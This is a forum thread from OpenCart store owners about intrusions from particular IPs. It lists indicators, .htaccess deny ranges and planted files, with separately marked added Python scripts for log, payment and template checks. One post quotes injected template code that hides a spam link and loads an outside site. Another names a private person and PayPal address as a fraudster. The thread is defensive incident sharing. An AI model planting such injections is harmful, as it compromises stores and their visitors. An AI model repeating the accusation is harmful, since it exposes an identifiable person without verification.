
Hackers with Vietnam IPs

Posted: Sun Dec 23, 2012 4:18 pm
by MarketInSG
Some hackers with Vietnam IPs have been going around trying to hack sellers' stores. Here's some information that might be useful.

Common IPs used by the hackers:

1.55.210.180
1.54.*.*
113.190.139.39
US Proxy Servers

Files to look out for in your system:

system/helper/helper.php
download/ (yourfilename.random_characters.php_random_characters)
modified trojan infected index.html in download folder
download/cp.php

Range of IP recommended to block as they switch between those IPs in Vietnam:

113.22.0.0/16
113.23.0.0/17
113.52.32.0/19
113.61.108.0/22
113.160.0.0/11
1.52.0.0/14

Anyway, the 113.x.x.x range has been committing a lot of fraud recently.

They also attempt to create an admin user account in the system.
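A quick way to turn the indicators in this post into a check is to run them over the web-server access log. The script below is an added example (not code from the post, not OpenCart code): the CIDR ranges and file names are the ones listed above, the log lines in SAMPLE_LOG are constructed, and the admin route it watches (route=user/user/insert) is an assumption about how an admin user is created in OpenCart 1.5.

```python
"""Scan combined-format access log lines for the indicators in the post above.

Added example, not from the original post or from OpenCart. IP ranges and file
names come from the post; SAMPLE_LOG is constructed; the admin route is an
assumption about OpenCart 1.5.
"""
import ipaddress
import re
import sys

# ip_network() is strict by default, so a range with host bits set
# (e.g. a typo like 113.61.109.0/22) raises ValueError instead of silently
# blocking the wrong network.
BLOCKED_RANGES = [ipaddress.ip_network(c) for c in (
    "113.22.0.0/16", "113.23.0.0/17", "113.52.32.0/19",
    "113.61.108.0/22", "113.160.0.0/11", "1.52.0.0/14",
)]

# Files from the post: the dropped helper, download/cp.php, and the
# "yourfilename.<random>.php_<random>" disguise in the download folder.
SUSPICIOUS_PATH_RE = re.compile(
    r"(?:system/helper/helper\.php|download/cp\.php|download/[^ ?]*\.php_[A-Za-z0-9]+)"
)

# Assumption: creating an admin user in OpenCart 1.5 is a POST to this route.
ADMIN_USER_RE = re.compile(r"/admin/.*route=user/user/insert")

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

SAMPLE_LOG = [  # constructed lines, not real traffic
    '1.55.210.180 - - [23/Dec/2012:10:11:12 +0800] "GET /download/cp.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '113.190.139.39 - - [23/Dec/2012:10:12:40 +0800] "POST /admin/index.php?route=user/user/insert&token=abc HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [23/Dec/2012:10:13:01 +0800] "GET /index.php?route=product/product&product_id=42 HTTP/1.1" 200 9813 "-" "Mozilla/5.0"',
    '178.238.228.92 - - [23/Dec/2012:10:14:55 +0800] "GET /download/invoice.pdf.ab12.php_xyz HTTP/1.1" 200 77 "-" "Mozilla/5.0"',
]


def in_blocked_range(ip):
    """True if ip falls inside any of the ranges the post recommends blocking."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in BLOCKED_RANGES)


def classify(ip, method, path):
    """Return the list of reasons a request is suspicious (empty if none)."""
    reasons = []
    if in_blocked_range(ip):
        reasons.append("blocked-range")
    if SUSPICIOUS_PATH_RE.search(path):
        reasons.append("suspicious-path")
    if method == "POST" and ADMIN_USER_RE.search(path):
        reasons.append("admin-user-create")
    return reasons


def scan_log(lines):
    """Return a list of (ip, path, reasons) for every line that trips a check."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        reasons = classify(m["ip"], m["method"], m["path"])
        if reasons:
            hits.append((m["ip"], m["path"], reasons))
    return hits


if __name__ == "__main__":
    source = open(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_LOG
    for ip, path, reasons in scan_log(source):
        print(ip, path, ",".join(reasons))
```

Run it as `python scan.py /path/to/access.log`; without an argument it runs over the constructed sample. A request from outside the listed ranges that still touches download/*.php_* (the last sample line) is reported on the path alone, which matters because the attackers also come through US proxies.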

Re: Hackers with Vietnam IPs

Posted: Sun Dec 23, 2012 4:25 pm
by i2Paq
How would one go about blocking these via .htaccess?

This so others can block them if they're not selling in that area.

Thanks for posting btw.

Re: Hackers with Vietnam IPs

Posted: Sun Dec 23, 2012 4:42 pm
by MarketInSG
Not to be offensive, but I rarely have Vietnamese buyers. You just deny them through your .htaccess file. Entering the IP address/subnet will block off the whole range correctly.

Re: Hackers with Vietnam IPs

Posted: Sun Dec 23, 2012 7:41 pm
by spikeachu
Just a heads up to anyone else affected;

If they've used the same tool as they have to hack mine, you might also want to clear your /tmp directory as they have placed key files in mine to allow themselves ssh access.

Re: Hackers with Vietnam IPs

Posted: Sun Dec 23, 2012 10:12 pm
by i2Paq
JoseManuel wrote: Watch this topic open. http://forum.opencart.com/viewtopic.php?f=10&t=91623

The IPs and nationality of the attacks seen by me are not real.
I move that topic to the Moderators forum to have it analyzed.

Re: Hackers with Vietnam IPs

Posted: Sun Dec 23, 2012 10:17 pm
by trinkaljuneja
So we have to change the admin default username/password.

And developers who give admin access to people to show their mods have to disable access to the download tab via the admin permission feature.

Is this all, or am I missing something?

Re: Hackers with Vietnam IPs

Posted: Sun Dec 23, 2012 11:08 pm
by MarketInSG
If your main store is linked to the demo sites, change your database password! Check your error logs in OpenCart and cPanel. Denying the listed IPs is recommended. Monitor traffic accessing suspicious files that shouldn't be on your server. Monitor consistently for a week or two. A waste of time, but better safe than sorry.

Re: Hackers with Vietnam IPs

Posted: Sun Dec 23, 2012 11:26 pm
by MarketInSG
Another IP to note: 178.238.228.92.

The bad thing about these hackers is that they always forget to clear their footprints after they are done. And the bad thing about us is that we never take enough precautions. Best practice is to comment out the block of PHP code that does uploading. Removing the JavaScript isn't enough. Or just change the folder's permissions.

Re: Hackers with Vietnam IPs

Posted: Mon Jan 14, 2013 11:02 am
by Demon5
i2Paq wrote: How would one go about blocking these via .htaccess?

This so others can block them if they're not selling in that area.

Thanks for posting btw.

# Apache does not allow comments on the same line as a directive,
# so each comment has to sit on its own line.
order allow,deny
allow from all
deny from 88.131.106.0/24
# Baidu Spider
deny from 180.76.5.0/24
# Baidu
deny from 220.181.108.0/24
deny from 208.83.156.0/24
deny from 113.22.0.0/16
deny from 113.23.0.0/17
deny from 113.52.32.0/19
deny from 113.61.108.0/22
deny from 113.160.0.0/11
deny from 1.52.0.0/14

Re: Hackers with Vietnam IPs

Posted: Fri Feb 08, 2013 9:30 am
by sigue
My website was hacked two times in the last two weeks. I cannot log in to the admin panel even after resetting the password via the database in phpMyAdmin. Before that I had not realized that my website had been hacked, until I noticed in the user table of the database that the IP address is not mine; when I checked the IP location, it is from Vietnam.
And yesterday someone from Vietnam tried to steal my product by purchasing it at a very low price: the product price is $19.95, but he only paid $0.01 to my PayPal. I don't know how he could do it; fortunately the order status is pending, so (maybe) he can't download the files.
Does anyone know which system files could have been hacked, causing me to be unable to log in to admin?

Everyone, be careful with these IPs:
113.166.96.13
123.21.178.196
93.139.33.141

And be careful with this name (he registered as Andrea Pots, but I got his name from the PayPal payment details):
Minh Phuc Duong
paypal address: phucduongqb@zing.vn
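The $0.01 payment for a $19.95 order above is the case a store should catch before it marks anything complete. The function below is an added example (not from sigue's post, not OpenCart's PayPal module): it compares a payment notification against the stored order and only completes the order when the amount, currency, receiver and order id all match and the transaction id has not been credited before. The order and both notifications are constructed; the field names follow PayPal IPN variables, and verifying that the notification itself is genuine (the round-trip to PayPal) is assumed to have already happened.

```python
"""Compare a payment notification against the stored order before fulfilling.

Added example; not from the post and not OpenCart code. ORDER and the two
notifications are constructed. Field names follow PayPal IPN variables; the
IPN authenticity check is assumed to run before settle().
"""
from decimal import Decimal, InvalidOperation

# Constructed order record: a $19.95 product, as in the post.
ORDER = {"order_id": 1001, "total": "19.95", "currency": "USD"}

# Constructed notifications: one genuine, one paying $0.01 for the same order.
PAID_IN_FULL = {
    "payment_status": "Completed", "receiver_email": "seller@example.com",
    "custom": "1001", "mc_currency": "USD", "mc_gross": "19.95", "txn_id": "TXN-A1",
}
UNDERPAID = dict(PAID_IN_FULL, mc_gross="0.01", txn_id="TXN-B2")


def settle(order, note, seen_txn_ids, expected_receiver):
    """Return ("complete", None) or ("pending", reason).

    The notification's amount is never trusted on its own: the order stays
    pending unless amount, currency, receiver and order id all match the
    stored order, and a transaction id can only be credited once.
    """
    if note.get("payment_status") != "Completed":
        return "pending", "status %r is not Completed" % note.get("payment_status")
    if note.get("receiver_email", "").lower() != expected_receiver.lower():
        return "pending", "paid to a different receiver"
    if note.get("custom") != str(order["order_id"]):
        return "pending", "notification is for another order"
    if note.get("mc_currency") != order["currency"]:
        return "pending", "currency %s, expected %s" % (note.get("mc_currency"), order["currency"])
    try:
        paid = Decimal(note.get("mc_gross", "0"))
    except InvalidOperation:
        return "pending", "unparseable amount"
    total = Decimal(order["total"])
    if paid < total:
        return "pending", "paid %s of %s" % (paid, total)
    txn = note.get("txn_id")
    if not txn or txn in seen_txn_ids:
        return "pending", "missing or already-credited txn_id"
    seen_txn_ids.add(txn)  # a replayed notification cannot complete the order twice
    return "complete", None


if __name__ == "__main__":
    seen = set()
    print(settle(ORDER, PAID_IN_FULL, seen, "seller@example.com"))
    print(settle(ORDER, UNDERPAID, seen, "seller@example.com"))
```

Amounts are compared as Decimal rather than float so that 19.95 is compared exactly; the underpaid notification stays pending with the reason recorded, which is the behaviour that saved the downloads in the post above.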

Re: Hackers with Vietnam IPs

Posted: Fri Feb 08, 2013 10:42 pm
by MarketInSG
If you provide demo sites, check all of them. Check your download folders in case they made a backdoor program or something of the sort. Happy searching ~

Re: Hackers with Vietnam IPs

Posted: Mon Feb 11, 2013 10:38 am
by OpenCart Addons
I noticed the suspicious file about the time this thread was started. Followed a lot of the good steps laid out in the previous posts and haven't had any issues since.


Cheers,

Joel.

unknown person injected some code in header.tpl

Posted: Tue Mar 05, 2013 12:55 pm
by sigue
I found that someone has injected some code into header.tpl, footer.tpl and content_top.tpl, and maybe into other files, and I found it in (maybe) almost all of my demo theme links; I'm still in the process of checking the files now.
The code is injected/inserted in the notification div id in the header.tpl file, so theme makers, please also check your demo links' files; maybe it has happened to you too, but I hope not.

Here is the code that has been injected:
<style>#getcms,.h1en{width:1px; height:1px; position:absolute; overflow:hidden;}</style>
<h1 class="h1en"><a href="http://cartcms.net" title="Cart CMS - Free Shopping Cart CMS" rel="dofollow">Cart CMS - Free Shopping Cart CSM</a>
<div id="getcms"></div></h1>
<script type="text/javascript"><!--
$(document).ready(function() {
$('#getcms').load('http://cartcms.net');
});
//--></script>
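The snippet above has two signatures worth scanning templates for: an inline style that collapses an id or class to a 1x1 hidden box, and a link or jQuery .load() inside such an element pointing at a foreign host. The scanner below is an added example (not from sigue's post, not OpenCart code): INJECTED is the snippet posted above, CLEAN is a constructed stand-in for an untouched notification div, and the store host "example-store.com" is an assumed value; anything linking or loading from a different host is reported.

```python
"""Find hidden-link / remote-load SEO injections in OpenCart .tpl templates.

Added example, not part of the post. INJECTED is the snippet from the post,
CLEAN is constructed, and "example-store.com" is an assumed store host.
"""
import os
import re
import sys

STYLE_RE = re.compile(r"<style[^>]*>(.*?)</style>", re.I | re.S)
RULE_RE = re.compile(r"([^{}]+)\{([^}]*)\}")
HREF_RE = re.compile(r'<a\s[^>]*href="https?://([^"/]+)', re.I)
LOAD_RE = re.compile(r"\.load\(\s*['\"](https?://([^'\"/]+)[^'\"]*)['\"]", re.I)

INJECTED = """<div id="notification"><style>#getcms,.h1en{width:1px; height:1px; position:absolute; overflow:hidden;}</style>
<h1 class="h1en"><a href="http://cartcms.net" title="Cart CMS - Free Shopping Cart CMS" rel="dofollow">Cart CMS - Free Shopping Cart CSM</a>
<div id="getcms"></div></h1>
<script type="text/javascript"><!--
$(document).ready(function() {
$('#getcms').load('http://cartcms.net');
});
//--></script></div>"""

CLEAN = """<div id="notification"></div>"""  # constructed, unmodified template fragment


def hidden_selectors(html):
    """Ids/classes that an inline <style> collapses to a 1x1 invisible box."""
    names = set()
    for block in STYLE_RE.findall(html):
        for sel, decl in RULE_RE.findall(block):
            d = decl.lower().replace(" ", "")
            if "width:1px" in d and "height:1px" in d and (
                    "overflow:hidden" in d or "position:absolute" in d):
                for s in sel.split(","):
                    s = s.strip()
                    if s and s[0] in "#.":
                        names.add(s[1:])
    return names


def scan_template(html, site_host):
    """Return ("hidden-link", selector, host) and ("remote-load", host, url) findings."""
    findings = []
    for name in sorted(hidden_selectors(html)):
        # Any element carrying the hidden id/class, with its inner HTML.
        elem_re = re.compile(
            r'<(\w+)[^>]*\b(?:id|class)="[^"]*\b%s\b[^"]*"[^>]*>(.*?)</\1>' % re.escape(name),
            re.I | re.S)
        for m in elem_re.finditer(html):
            for host in HREF_RE.findall(m.group(2)):
                if host.lower() != site_host.lower():
                    findings.append(("hidden-link", name, host))
    for url, host in LOAD_RE.findall(html):
        if host.lower() != site_host.lower():
            findings.append(("remote-load", host, url))
    return findings


def scan_tree(root, site_host):
    """Scan every .tpl under root; return {path: findings} for files with hits."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.endswith(".tpl"):
                path = os.path.join(dirpath, fn)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found = scan_template(fh.read(), site_host)
                if found:
                    report[path] = found
    return report


if __name__ == "__main__":
    if len(sys.argv) > 2:  # usage: scan_tpl.py catalog/view/theme example-store.com
        for path, found in scan_tree(sys.argv[1], sys.argv[2]).items():
            print(path, found)
    else:
        print(scan_template(INJECTED, "example-store.com"))
```

The check is deliberately loose on markup (regexes, not a parser) because injected fragments are often dropped into the middle of a template and do not form a well-formed document on their own; run it over catalog/view/theme on every demo site, and treat any hit as a reason to pull the whole file from version control rather than just delete the snippet.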